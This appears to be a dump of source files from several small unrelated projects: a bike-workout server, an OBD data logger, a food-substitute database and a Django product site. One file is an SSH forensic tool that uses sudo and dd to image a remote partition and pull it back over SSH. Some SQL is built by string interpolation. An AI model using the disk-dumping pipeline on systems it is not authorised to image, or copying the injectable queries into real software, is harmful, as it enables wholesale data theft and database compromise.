def write_workout(self, workout: dict) -> None:
db = firestore.client()
db.collection(firebase_properties.collection).document(str(uuid.uuid4())).set({firebase_properties.list_values_key: workout})
def push_heartrate_request(self, start: bool) -> None:
# The topic name can be optionally prefixed with "/topics/".
topic = "exercise"
# See documentation on defining a message payload.
message = messaging.Message(
data={'started': str(start)},
topic=topic,
)
print_debug(message)
# Send a message to the devices subscribed to the provided topic.
response = messaging.send(message)
print_debug(response)
if __name__ == "__main__":
Firebase().push_heartrate_request(True)
```
#### File: 89jd/pi-bike-server/server.py
```python
from server import BikeDataServer
from bikesensor import BikeSensor
from routine import BikeRoutine
import threading
import logging
from config import properties
from utils import print_debug, debug
if not debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.WARNING)
routine = None
gear = 8
def initialise_routine():
print_debug('Initialise routine')
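# Stop any routine that is already running, build a fresh one, and re-bind the socket server callbacks to it.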
global gear
global routine
if routine:
print_debug("stopping existing")
routine.stop()
routine = BikeRoutine(gear, lambda: BikeSensor(**vars(properties.revolution_sensor)))
routine.on_update = server.emit_exercise_data
routine.on_idle_cb = server.emit_idle_state
routine.on_duration_update = server.emit_duration
server.on_reset_exercise = lambda _: initialise_routine()
server.on_paused = lambda _: routine.force_pause()
server.on_resumed = lambda _: routine.resume()
def increase_gear():
global gear
gear += 1
server.emit_gear(gear)
routine.gear = gear
def decrease_gear():
global gear
gear -= 1
server.emit_gear(gear)
routine.gear = gear
server.on_gear_increased = lambda _: increase_gear()
server.on_gear_decreased = lambda _: decrease_gear()
server.on_heart_rate_received = lambda heart_rate: routine.publish_heartrate(heart_rate)
def toggle_pause():
if routine.paused:
routine.resume()
else:
routine.force_pause()
server.on_toggle_pause = lambda _: toggle_pause()
server.emit_gear(gear)
threading.Thread(target=routine.start, daemon=True).start()
print_debug('Start server')
server = BikeDataServer()
server.on_exercise_stopped = lambda _: initialise_routine()
initialise_routine()
server.on_connected = lambda _: print_debug('Client connected')
if __name__ == '__main__':
server.start()
``` |
{
"source": "8ahmedanwer8/ElectronOBD",
"score": 3
} |
#### File: ElectronOBD/python_engine/getData.py
```python
import obd
import obdHandler as obh
import json
import utils as u
import pandas as pd
from threading import Thread
import time
data = [] #the data exported as csv at the end
heading = []#headings for the csv, like the titles for each column
def main(): # worker thread collects OBD data while the main thread waits for input from main.js to end this loop
time.sleep(3) # running the script from the terminal briefly blocks the serial port (surprisingly), so wait until the blocking clears, which seems to happen just after the first lines execute
connection = obd.OBD()
supportedCommands,supportedCommandsNames, supportedCommandsUnits, _ = obh.getSupported(connection)
headingWithoutTimeColumn = obh.addUnitsToCSVHeading(supportedCommandsNames, supportedCommandsUnits)
headingWithoutTimeColumn.insert(0, "TIME")
heading.append(headingWithoutTimeColumn)
while True:
# time.sleep(1)
output = obh.getCurrentData(connection,supportedCommands) #output variable is the data collected in one iteration
currentTime = time.ctime(time.time()) #get current time
print(json.dumps(output)) #prints it to stdout and main.js receives it
output.insert(0, currentTime) #prepend the current time to this row
data.append(output) #append current data to total output data array for when csv export is called
if flag != 0:
break
return
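# flag is flipped to 1 by the main thread once any input arrives, which ends the worker loop above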
flag = 0
getDataThread = Thread(target = main)
getDataThread.daemon = True
getDataThread.start()
while True:
inp = input()
if (inp):
u.csvExporter(heading, data)
flag = 1
``` |
{
"source": "8angy/Linux_SSH_Forensic_Dumper",
"score": 2
} |
#### File: 8angy/Linux_SSH_Forensic_Dumper/lxdumper.py
```python
import os, sys
from os.path import join as pj
from getpass import getpass
import time
from tqdm import tqdm
import threading
import argparse
import pexpect
import ipaddress
NEWKEY = '(?i)are you sure you want to continue connecting'
def get_target_details():
os.system('clear')
operating_system = ''
details_cmd = ('ssh {0}@{1} lsb_release -d'.format(args.TU, args.TI))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', details_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
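# expect() index: 0 = timeout, 1 = unknown host key prompt, 2 = already at a shell prompt, 3 = password prompt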
if i == 0:
print('[!] ERROR! SSH connection has failed.')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
out = child.read().decode('ascii')
child.terminate()
if 'Description:' in out:
for line in out.splitlines():
if 'Description:' in line.strip():
operating_system = line.strip()
operating_system = operating_system.replace('Description:', '')
return operating_system
def parse_partitions(shell_output):
partitions = []
shell_output = list(filter(None, shell_output.lstrip().strip().splitlines()))
remove_list = ['/', '.', ' - ', '@', ':', '#']
for r in remove_list:
for i in shell_output:
if r in i:
try:
shell_output.remove(i)
except:
pass
for count, parts in enumerate(shell_output, start=0):
col = parts.split(' ')
col = [s for s in col if s != '']
dev = col[3]
size = col[2]
size_mb = '{}MB'.format(str(round((int(col[2])*1024)/1000000)))
partitions.append('{}. {} {} {}'.format(count,dev,size,size_mb))
return partitions
def get_target_partitions():
fdisk_cmd = ('ssh {0}@{1} cat /proc/partitions'.format(args.TU, args.TI))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', fdisk_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
if i == 0:
print('[!] ERROR! SSH connection has failed.')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
partitions = parse_partitions(child.read().decode('ascii'))
child.terminate()
print('')
for i in partitions:
print(i)
while True:
chosen_partition = input('\n[*] Please type the index of the '
'partition you would like to dump: ')
if chosen_partition.isdigit():
if int(chosen_partition) < len(partitions):
break
else:
print('[!] Not an integer! Please select a number between '
'0 and {}'.format(len(partitions)-1))
return (partitions[int(chosen_partition)]).split(' ')
def run(BLOCK_DEV, dump_filename):
global running
checksum = None
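# Remote pipeline: dd reads the block device, tee feeds a copy to the checksum tool (printed on stderr),
# gzip compresses the stream, and a local dd writes the result to <dump_filename>.gz.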
dump_cmd = ('ssh {0}@{1} '
'"sudo -S dd conv=sync,noerror bs={2}k if=/dev/{3} '
'| tee >({4} >/dev/stderr) '
'| gzip -{6} -" '
'| dd bs={2} of={5}.gz'.format(args.TU, args.TI, args.BS, BLOCK_DEV,
args.CS, dump_filename, args.Z))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', dump_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
if i == 0:
print('[!] ERROR! could not login with SSH')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
child.timeout = 36000
out = child.read()
child.terminate()
shell_output = list(filter(None, out.lstrip().strip().splitlines()))[1:]
for line in shell_output:
if '-' in line.decode('ascii'):
checksum = line.decode('ascii').replace('-','').strip()
running = False
time.sleep(0.5)
if checksum:
print('\n\n{}:\t{}'.format(args.CS, checksum))
print('Finished Dumping!')
checksum_tf = pj(os.getcwd(),'{}_checksum.txt'.format(BLOCK_DEV))
open(checksum_tf, 'a').close()
with open(checksum_tf, 'w') as ctf:
ctf.write('Target IP: {}\n'.format(args.TI))
ctf.write('Block: {}\n'.format(BLOCK_DEV))
ctf.write('Block Size: {}k\n'.format(args.BS))
ctf.write('{}: {}\n'.format(args.CS, checksum))
def progress(total_size, partition, dump_filename):
global running
total_size = int(total_size)*1024
print('Dumping {} from {}'.format(partition, args.TI))
print('Block Size: {} | Compression Level: {} '
'| Checksum: {}\n'.format(args.BS, args.Z, args.CS))
pbar = tqdm(total=100, unit='B', unit_scale=True, desc='{}'.format(partition))
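# Poll the size of the growing local .gz file with stat and advance the bar one percent at a time,
# using the (uncompressed) partition size as the 100% reference.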
for i in range(0,100):
if running:
while True:
child = pexpect.spawn('stat {}.gz'.format(dump_filename))
child.expect(dump_filename)
buff = child.read().decode('ascii')
child.terminate()
shell_output = buff.strip()
size = (shell_output[shell_output.index('Size: '):
shell_output.index('Blocks: ')][6:]).strip()
size = int(size)
percent = round((size/total_size)*100)
if not running:
pbar.update(100-i)
break
if i == percent:
pbar.update(1)
break
else:
time.sleep(0.01)
buff = ''
else:
sys.exit()
if __name__ == '__main__':
print('\nLINUX SSH FORENSIC DUMPER')
print("Append the '--help' command to see usage in detail")
parser = argparse.ArgumentParser(description='Forensic Dump of a Linux OS over SSH')
parser.add_argument('--TI', nargs='?', required=True,
help='The IP address of the target Linux machine.')
parser.add_argument('--TU', nargs='?', required=True,
help='An admin account user of the target Linux machine. e.g. root')
parser.add_argument('--Z', default='3', nargs='?', const='3', type=str,
help='gzip compression. 1 = min (fastest) | 9 = max (slowest). Default: 3')
parser.add_argument('--BS', default='128', nargs='?', const='128', type=str,
help='Block size in KB, (e.g 64, 128, 1024, 65536). Default: 128')
parser.add_argument('--CS', default='md5sum', nargs='?', const='md5sum', type=str,
help='Checksum the dump (cksum=CRC, md5sum=MD5, sha1sum=SHA1). Default: md5sum')
args = parser.parse_args()
global running
running = True
# check inputs
if ipaddress.ip_address(str(args.TI)):
pass
else:
running = False
print('[!] Error! The Target IP address entered is not valid.')
sys.exit()
if len(args.TU) < 2:
print('[!] Error! The Target User is not valid.')
running = False
sys.exit()
if args.BS.isdigit() and (int(args.BS) <= 1310720) and (int(args.BS) % 16 == 0):
pass
else:
running = False
print('[!] Error! Block Size [--BS] must be less than or equal to '
'1310720 and be divisible by 16.')
sys.exit()
if args.Z.isdigit() and int(args.Z) in range(1,10):
pass
else:
running = False
print('[!] Error! gzip compression [--Z] must be an integer '
'between 1 and 9.')
sys.exit()
if args.CS in ['md5sum', 'cksum', 'sha1sum']:
pass
else:
running = False
print('[!] Error! Checksum [--CS] must be either "cksum", '
'"md5sum" or "sha1sum".')
sys.exit()
while True: # connect to target
print('\nPlease input the password for the target: {}'.format(args.TU))
target_passwd = getpass()
if len(target_passwd) > 0:
break
if running:
target_details = get_target_details()
print('LINUX SSH FORENSIC DUMPER')
print('Partitions found on {}'.format(args.TI))
if len(target_details) > 0:
print('OS: {}'.format(target_details.lstrip()))
BLOCK_DEV = get_target_partitions()
dump_filename = '{}_{}_{}'.format(args.TU, args.TI,
BLOCK_DEV[1])
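# Run the dump and the progress display in parallel threads; progress() exits once run() clears the running flag.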
p1 = threading.Thread(target = run, args=(BLOCK_DEV[1],
dump_filename))
p1.start()
p2 = threading.Thread(target = progress, args =(BLOCK_DEV[2],
BLOCK_DEV[1], dump_filename))
p2.start()
``` |
{
"source": "8aqtba9y/stduy-python-Movie-Website",
"score": 3
} |
#### File: 07_make classes_advanced/04_Final/movie.py
```python
import media
import webbrowser as wb
class Movie(media.Media):
def __init__(self, title, storyline, poster_image, trailer_youtube, series):
media.Media.__init__(self, title, storyline, poster_image, trailer_youtube)
self.series = series
def show_trailer(self):
wb.open(self.trailer_youtube_url)
``` |
{
"source": "8area8/MacGyver-The-game-",
"score": 3
} |
#### File: core/introduction/core_intro.py
```python
from core.modules.interface import Interface
from core.modules.musics import Music
class Introduction(Interface):
"""The first called interface.
Display an image and play a music for three seconds.
"""
def __init__(self, images):
"""Initialize the core variables."""
super().__init__()
self.windows["bg"] = images["backgrounds"]["intro"]
self.musics = Music("introduction")
self.musics.play_music()
self.timer = 0
self.max_timer = 90
def start_events(self, events):
"""No events."""
pass
def update(self):
"""Update the timer."""
self.timer += 1
if self.timer == self.max_timer:
self.musics.stop_music()
self.change_to = "Game"
def draw(self):
"""Draw the elements."""
self.windows["main"].blit(self.windows["bg"], (0, 0))
```
#### File: tests/game/test_map.py
```python
from pygame import display
from pygame.sprite import Sprite
from core.modules.map_file import import_map
from core.modules.images import collect_images
from core.modules.constants import SCREEN_SIZE
from core.game.map import Map
def test_map():
"""Test the map module."""
display.init()
display.set_mode(SCREEN_SIZE)
images = collect_images()
map_file = import_map()
map_ = Map(images, map_file)
assert len(map_[0]) == 225
for layer in map_:
for key in layer.keys():
assert isinstance(key, tuple)
assert isinstance(layer[key], Sprite)
for digit in key:
assert isinstance(digit, int)
```
#### File: tests/modules/test_map_file.py
```python
from core.modules.map_file import import_map
def test_map_file():
"""Test the importation."""
assert import_map()
``` |
{
"source": "8area8/P5_FoodLik",
"score": 3
} |
#### File: back/database/create_database.py
```python
from os import listdir, path
from pathlib import Path
import json
from core.back.database.databases_wrapper import database_wrapper as database
def init():
"""Initialize the database creation."""
print("Wait few minutes...")
_create_foodlik()
database.connect()
_create_structure()
_fill_in_database()
database.close()
print("database ready for use.")
def _create_foodlik():
"""Create the foodlik database."""
database.connect("root")
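# Recreate the database from scratch: any existing 'foodlik' database is dropped first.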
database.execute("DROP DATABASE IF EXISTS foodlik")
database.execute("CREATE DATABASE foodlik")
database.close()
print("database created.")
def _create_structure():
"""Create the database structure."""
path = str(Path().resolve() / "core" / "back" / "database")
database.execute(open(path + "/structure.sql", "r").read(), multi=True)
print("structure created.")
def _fill_in_database():
"""Fill in 'foodlik' of datas."""
datas_path = Path().resolve() / "core" / "back" / "requests"
datas_path = datas_path / "datas"
_fill_in_categories(datas_path)
_fill_in_products(datas_path)
_fill_in_products_number(datas_path)
def _fill_in_categories(datas_path):
"""Fill in database of categories."""
cat_fr = str(datas_path / "categories_fr.json")
with open(cat_fr, "r", encoding="utf8") as file:
categories = json.load(file)
for name in categories:
database.execute(f"INSERT INTO category (title) VALUES ('{name}')")
print("Categories done.")
def _fill_in_products(datas_path):
"""Fill in database of products."""
prod_path = datas_path / "products"
for index, file in enumerate(listdir(prod_path)):
with open(str(prod_path / file), "r", encoding='utf8') as product_file:
datas = json.load(product_file)
for product in datas:
try:
_insert_product(product)
name = product["name"]
for ctg in set(product["categories"]): # lazy set, sorry. :p
_insert_categorie_per_product(ctg, name)
except Exception as error:
write_error(error)
print(f"file {index + 1} done.")
def _insert_product(product):
"""Insert a product into the database."""
name = product["name"]
descr = product["description"]
stores = product["stores"]
url = product["site_url"]
score = product["score"]
database.execute("INSERT INTO product (title, description, "
"stores, site_url, score) VALUES "
f"('{name}', '{descr}', '{stores}',"
f" '{url}', '{score}')")
def _insert_categorie_per_product(ctg, name):
"""Insert all categories of a product."""
database.execute("INSERT INTO category_per_product "
"(category_title, product_title) "
f"VALUES ('{ctg}', '{name}')")
def _fill_in_products_number(datas_path):
"""Insert the products number of each category.
Remove lines that do not contain products.
"""
database.execute("SELECT title FROM CATEGORY")
result = [wrd[0] for wrd in database.get_row(True) if wrd[0]]
for category in result:
database.execute("SELECT COUNT(*) "
"FROM CATEGORY_PER_PRODUCT AS CPP "
f"WHERE CPP.category_title='{category}'")
database.execute("UPDATE CATEGORY "
f"SET product_number = {database.get_row()[0]} "
f"WHERE CATEGORY.title = '{category}'")
database.execute("DELETE FROM CATEGORY "
"WHERE product_number = 0")
def write_error(error):
"""Write the errors in a file.
MySQL generates a lot of errors.
"""
mode = "a" if path.exists("error.log") else "w"
with open("error.log", mode, encoding="utf8") as file:
file.write(str(error) + "\n")
```
#### File: front/classes/substitute.py
```python
from termcolor import colored
from core.front.classes.globals import BaseSection
from core.back.database.data_wrapper import datas_wrapper as datas
from textwrap import wrap
class Substitute(BaseSection):
"""The substitute class."""
# pylint: disable=too-many-instance-attributes
def __init__(self):
"""Initialization."""
super().__init__()
self.name = datas.chosen_product.upper()
self.c_return_sub = "[retour sub]: retour à la page des substituts.\n"
@property
def header(self):
"""Return the header informations."""
title = f" {self.name}"
return colored(title, "yellow") + "\n" + " " + "-" * 23
@property
def content(self):
"""Return the content."""
content = datas.load_substitute_page()
text = colored(" SUBSTITUT:\n", "green")
titles = ("nom: ", "description: ",
"magasins: ", "url: ", "nutri-score: ")
for title, caract in zip(titles, content[0]):
caract = "\n ".join(wrap(str(caract), 45))
text += " * " + colored(title, "green") + caract + "\n"
text += colored("\n PRODUITS SUBSTITUES:\n", "green")
for product in content[1]:
product = "\n ".join(wrap(str(product[0]), 45))
text += " * " + product + "\n"
return text + "\n"
@property
def footer(self):
"""Return the footer informations.
Call 'super().footer' to get the error messages.
"""
return (self.comm + self.c_return_sub +
self.c_return_title +
self.c_quit + "\n") + super().footer
@property
def actions(self):
"""Return the possible actions.
Call 'super().actions' to get the basic actions.
"""
return (["retour sub"] + self.a_return_title + super().actions)
def apply(self, action):
"""Apply an action."""
if action == "retour sub":
self.change_to = "Substitutes"
if action == "retour titre":
self.change_to = "TitleScreen"
``` |
{
"source": "8area8/p8_pure_beurre",
"score": 3
} |
#### File: app/extended_lib/anonymous.py
```python
from django.shortcuts import redirect
def anonymous_required(redirect_url):
"""For views that allow only unauthenticated users to access view.
Usage:
@anonymous_required(redirect_url='company_info')
def homepage(request):
return render(request, 'homepage.html')
"""
def _wrapped(view_func, *args, **kwargs):
def check_anonymous(request, *args, **kwargs):
view = view_func(request, *args, **kwargs)
if request.user.is_authenticated:
return redirect(redirect_url)
else:
return view
return check_anonymous
return _wrapped
```
#### File: apps/login/forms.py
```python
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class SignUpForm(UserCreationForm):
"""Specific form with intermediate email value for signup."""
email = forms.EmailField(
max_length=254, help_text='Requis. Renseignez une adresse mail valide.')
class Meta:
"""User fields."""
model = User
fields = ('username', 'email', '<PASSWORD>', '<PASSWORD>', )
def clean_email(self):
"""Return the email if entered email is unique.
Otherwise gives duplicate_email error.
"""
email = self.cleaned_data['email']
if User.objects.filter(email=email).exists():
raise forms.ValidationError("Cette adresse mail est déjà utilisé.")
return email
```
#### File: apps/login/models.py
```python
from django.db import models
from django.contrib.auth.models import User, AbstractUser
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.translation import ugettext_lazy as _
class Profile(models.Model):
"""User extended."""
user = models.OneToOneField(User, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)
# other fields...
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
```
#### File: management/commands/generate_products.py
```python
from django.core.management.base import BaseCommand, CommandError
from apps.products.tasks import ProductsGenerator as generator
class Command(BaseCommand):
"""Command class."""
help = 'Generate all products in database.'
def add_arguments(self, parser):
"""Arguments."""
# Positional arguments
parser.add_argument('--pages', dest='pages', type=int, required=True)
parser.add_argument('--celery', dest='celery',
type=bool, required=True)
def handle(self, *args, **options):
"""Handle the command."""
generator.generate_products(max_pages=options["pages"],
celery=options["celery"])
```
#### File: apps/products/models.py
```python
from django.db import models
from django.contrib.auth.models import User
class Category(models.Model):
"""Categorie model."""
name = models.CharField(max_length=150, unique=True)
def __str__(self):
"""Nicer str."""
return self.name
class Product(models.Model):
"""Product model."""
categories = models.ManyToManyField(Category)
name = models.CharField(max_length=150, unique=True)
description = models.TextField()
stores = models.TextField()
open_food_fact_url = models.URLField(max_length=250)
personal_url = models.URLField(max_length=250)
photo_url = models.URLField(max_length=250)
image_nutrition = models.URLField(max_length=300)
nutriscore = models.CharField(max_length=1)
def __str__(self):
"""Nicer str."""
return self.name
class Substitute(models.Model):
"""Substitute model."""
# NOTE: on_delete expects a deletion handler such as models.CASCADE; True is not a valid value, so CASCADE is assumed here.
user = models.ForeignKey(User, on_delete=models.CASCADE)
base_product = models.ForeignKey(
Product, on_delete=models.CASCADE, related_name='base_product')
substituted = models.ForeignKey(
Product, on_delete=models.CASCADE, related_name='substituted')
def __str__(self):
"""Nicer str."""
return f"substitut de {self.user.username} : {self.substituted.name}"
```
#### File: apps/products/tests.py
```python
import json
import httpretty
from django.test import TestCase, TransactionTestCase
from django.test import Client
from django.contrib.auth.models import User
from apps.products.models import Category, Product, Substitute
from apps.products.tasks import CategoriesHandler as cathandler
from apps.products.tasks import FilterProduct as filtprod
from apps.products.tasks import ProductsGenerator as prodgen
from apps.products.tasks import _generate_from_a_page
from apps.products.substitutes_algo import FindSubstitutes as findsub
from apps.products.substitutes_algo import disable_doubles
class CategoriesHandlerTestCase(TestCase):
"""CategoriesHandler tests class."""
def setUp(self):
"""Set up function."""
self.catone = Category.objects.create(name="foololo")
self.catwo = Category.objects.create(name="barlolo")
def test_create_categories_one_created(self):
"""Test create_categories function."""
category_names = "foololo,barlolo,etcfoo"
response = cathandler.create_categories(category_names)
self.assertTrue(Category.objects.filter(name="etcfoo").exists())
expected = [self.catone, self.catwo,
Category.objects.get(name="etcfoo")]
self.assertEqual(response, expected)
self.assertEqual(len(Category.objects.all()), 3)
def test_create_categories_zero_created(self):
"""Test create_categories function."""
category_names = "foololo,barlolo"
response = cathandler.create_categories(category_names)
expected = [self.catone, self.catwo]
self.assertEqual(response, expected)
self.assertEqual(len(Category.objects.all()), 2)
def test_create_categories_four_created(self):
"""Test create_categories function."""
category_names = "lala,lolo,lulu,lili"
response = cathandler.create_categories(category_names)
expected = Category.objects.all().exclude(name="foololo")
expected = expected.exclude(name="barlolo")
self.assertEqual(response, list(expected))
self.assertEqual(len(Category.objects.all()), 6)
class FilterProductTestCase(TestCase):
"""FilterProduct tests class."""
def setUp(self):
"""Set up function."""
self.base_product = {
"image_url": "example.com",
"url": "example.com",
"product_name": "foo",
"categories": "one,two,three",
"nutrition_grade_fr": "a",
"link": "",
"generic_name": "",
"stores": "auchan",
"image_nutrition_url": "example.com",
"xxx": "xxx",
"yyy": "yyy",
"zzz": "zzz"
}
def test_filtered_no_extra_fields(self):
"""Test filtered function."""
response = filtprod.filtered(self.base_product)
expected = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "one,two,three",
"nutriscore": "a",
"personal_url": "",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com"
}
self.assertEqual(response, expected)
def test_filtered_wrong_name(self):
"""Test filtered function."""
self.base_product["product_name"] = ""
response = filtprod.filtered(self.base_product)
self.assertIsNone(response)
def test_filtered_wrong_nutriscore(self):
"""Test filtered function."""
self.base_product["nutrition_grade_fr"] = "ab"
response = filtprod.filtered(self.base_product)
self.assertIsNone(response)
class ProductsGeneratorTestCase(TransactionTestCase):
"""ProductsGenerator tests class."""
def setUp(self):
"""Set up function."""
pass
def test_create_DataError(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo,foothree",
"nutriscore": "a",
"personal_url": "x" * 300,
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
self.assertEqual(len(Product.objects.all()), 0)
self.assertEqual(len(Category.objects.all()), 3)
def test_create_IntegrityError(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo",
"nutriscore": "a",
"personal_url": "example.com",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
filtered["categories"] = "fooone,footwo"
prodgen._create(filtered)
self.assertEqual(len(Product.objects.all()), 1)
self.assertEqual(len(Category.objects.all()), 2)
def test_create_good_result(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo,foothree",
"nutriscore": "a",
"personal_url": "example.com",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
self.assertTrue(Product.objects.filter(name="foo").exists())
self.assertEqual(len(Category.objects.all()), 3)
@httpretty.activate
def test_generate_from_page_good_result(self):
"""Test generate_from_a_page function.
NOTE: celery poses some problems during the test.
I disabled the asynchrone way.
"""
def mock_requests():
"""Mock json."""
json = {"products": [{
"image_url": "example.com",
"url": "example.com",
"product_name": "foo",
"categories": "fooone,footwo,foothree",
"nutrition_grade_fr": "a",
"link": "example.com",
"generic_name": "",
"stores": "auchan",
"image_nutrition_url": "example.com",
"xxx": "xxx",
"yyy": "yyy",
"zzz": "zzz"
}]}
return json
httpretty.register_uri(
httpretty.GET,
"https://example.com",
body=json.dumps(mock_requests()))
_generate_from_a_page.apply(args=("https://example.com", {})).get()
self.assertTrue(Product.objects.filter(name="foo").exists())
class ProductViewsTestCase(TestCase):
"""Views tests class."""
def setUp(self):
"""Set up function."""
self.client = Client()
self.product_url = "/products/research_product"
self.list_url = "/products/results_list"
self.info_url = "/products/informations"
self.substitute_url = "/products/save_substitute/"
User.objects.create_user(username="Foo", email="<EMAIL>",
password="<PASSWORD>")
Product.objects.create(name="oreo")
Product.objects.create(name="oreo2")
def test_research_product_found(self):
"""Test research_product."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.product_url}/{product}/")
self.assertTemplateUsed(response, "results.html")
self.assertEqual(response.context["other_results"], 1)
self.assertTrue(response.context.get("product"))
def test_research_product_not_found(self):
"""Test research_product."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "potiron"
response = self.client.get(f"{self.product_url}/{product}/")
self.assertTemplateUsed(response, "no_products_found.html")
def test_results_list_results(self):
"""Test results_list."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.list_url}/{product}/")
self.assertTrue(len(response.context["products"].object_list) == 2)
def test_results_list_no_results(self):
"""Test results_list."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "xzxzxz"
response = self.client.get(f"{self.list_url}/{product}/")
self.assertTrue(len(response.context["products"].object_list) == 0)
def test_informations_not_found(self):
"""Test informations."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "xzxzxz"
response = self.client.get(f"{self.info_url}/{product}/")
self.assertTemplateUsed(response, "product_not_found.html")
def test_informations_found(self):
"""Test informations."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.info_url}/{product}/")
self.assertTemplateUsed(response, "informations.html")
self.assertTrue(response.context.get("product"))
self.assertTrue(response.context.get("nutriscore_img"))
def test_save_substitute_no_double(self):
"""Test informations."""
user = User.objects.get(email="<EMAIL>")
self.client.login(email="<EMAIL>", password='<PASSWORD>')
base_product = Product.objects.get(name="oreo")
product = Product.objects.get(name="oreo2")
Substitute.objects.create(user=user, base_product=base_product,
substituted=product)
response = self.client.post(f"{self.substitute_url}",
{"base_product": base_product,
"product": product,
"next": self.substitute_url})
self.assertEqual(len(Substitute.objects.all()), 1)
def test_save_substitute_OK(self):
"""Test informations."""
user = User.objects.get(email="<EMAIL>")
self.client.login(email="<EMAIL>", password='<PASSWORD>')
base_product = Product.objects.get(name="oreo")
product = Product.objects.get(name="oreo2")
response = self.client.post(f"{self.substitute_url}",
{"base_product": base_product,
"product": product,
"next": self.substitute_url})
self.assertEqual(len(Substitute.objects.all()), 1)
class SubstitutesAlgoTestCase(TestCase):
"""Views tests class."""
def setUp(self):
"""Set up function."""
for index in range(5):
Category.objects.create(name=f"cat-{index}")
nutriscore = 96
for index in range(10):
if index % 2 == 0:
nutriscore += 1
product = Product.objects.create(name=f"prod-{index}",
nutriscore=chr(nutriscore))
Product.objects.get(
name="prod-0").categories.add(*Category.objects.all()[:3])
Product.objects.get(
name="prod-2").categories.add(*Category.objects.all()[2:])
Product.objects.get(
name="prod-4").categories.add(*Category.objects.all())
def test_filter_by_nutriscore_a_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("a", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_no_double(self):
"""Test filter_by_nutriscore function.
We add a product in the substitutes list before testing.
"""
products = Product.objects
substitutes = [products.filter(nutriscore="a")[0]]
findsub._filter_by_nutriscore("a", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_b_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("b", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_c_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("c", products, substitutes)
self.assertEqual(len(substitutes), 4)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b"])
def test_filter_by_nutriscore_d_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("d", products, substitutes)
self.assertEqual(len(substitutes), 6)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b", "c", "c"])
def test_filter_by_nutriscore_e_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("e", products, substitutes)
self.assertEqual(len(substitutes), 6)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b", "c", "c"])
def test_search_in_categories_len_0(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-0")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 0)
def test_search_in_categories_len_1(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-2")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 1)
def test_search_in_categories_len_2(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-4")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 2)
def test_run_ok(self):
"""Test run function."""
product = Product.objects.get(name="prod-4")
substitutes = findsub.run(product)
